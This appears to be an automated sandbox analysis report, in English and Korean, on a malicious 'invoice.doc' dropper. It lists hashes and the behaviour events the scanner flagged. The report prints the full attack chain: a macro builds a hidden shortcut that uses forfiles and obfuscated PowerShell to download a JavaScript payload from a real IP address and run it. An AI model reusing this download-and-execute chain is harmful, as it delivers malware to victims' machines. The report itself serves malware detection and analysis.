Malicious DOC/DropFileExec.FW.1010 profrog 1.5.0.305 10 invoice.doc DOC 2.817780 false false invoice.doc_16880 d:\Sample\sample_for_QuadMiners\invoice.doc invoice.doc 16880 DOC 36B85687634E5B6E4E22CA582D0CC99D 1B51B1206F2C4B1030A7FCA525454FB4D5BC803E invoice D80336481A8DD017C0B966BC18E74609243A2F05 504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000 skeml.lnk_258 invoice.doc_16880 D:/GIT/tripitaka/Build/x64Debug/tripitaka.exe.sandbox/C/Users/Public/skeml.lnk skeml.lnk 258 LNK 1205E837D76605911605E2FB589CD98D FF41313E2F2A860B0573F5EFA77B9962A88B3D82 A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D 086F7D4F4022A035D30A5DAFB1422C0C178C76BE EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A profrog 1.5.0.305 invoice.doc_16880 FakeEXT-DOCX 3 DOCX file has faked as `DOC` format. DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다. profrog 1.5.0.305 invoice.doc_16880 GetObject BC 1 GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL profrog 1.5.0.305 invoice.doc_16880 CreateShortCut BC 2 ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT profrog 1.5.0.305 invoice.doc_16880 Save BC 1 RECO(SHORTCUT).Save() RECO(SHORTCUT).Save() profrog 1.5.0.305 invoice.doc_16880 FileCreated FW 3 New file (C:\Users\Public\skeml.lnk) has been created. [DEFAULT] WindowStyle=7 IconLocation= TargetPath=fOrfiLeS Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" WorkingDirectory= 새로운 파일 (C:\Users\Public\skeml.lnk)이 생성되었습니다. [DEFAULT] WindowStyle=7 IconLocation= TargetPath=fOrfiLeS Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" WorkingDirectory= profrog 1.5.0.305 invoice.doc_16880 FileExtracted FW 3 C:\Users\Public\skeml.lnk profrog 1.5.0.305 invoice.doc_16880 Exec BC 3 ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk") ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk") profrog 1.5.0.305 invoice.doc_16880 DropFileExec FW 10 This is an attack that dropped an hidden file and executes. 감춰둔 파일을 생성해서 실행하는 공격입니다. profrog 1.5.0.305 invoice.doc_16880 RunDll32 FW 3 Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source. url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다. profrog 1.5.0.305 skeml.lnk_258 ForFiles FW 3 Attempts to run with forfiles. /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" forfiles로 특정 명령을 실행하려고 합니다. /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" profrog 1.5.0.305 skeml.lnk_258 PowerShell FW 8 Attempts to perform malicious commands with PowerShell. command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js PowerShell로 악의적인 명령을 수행하려고 합니다. command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js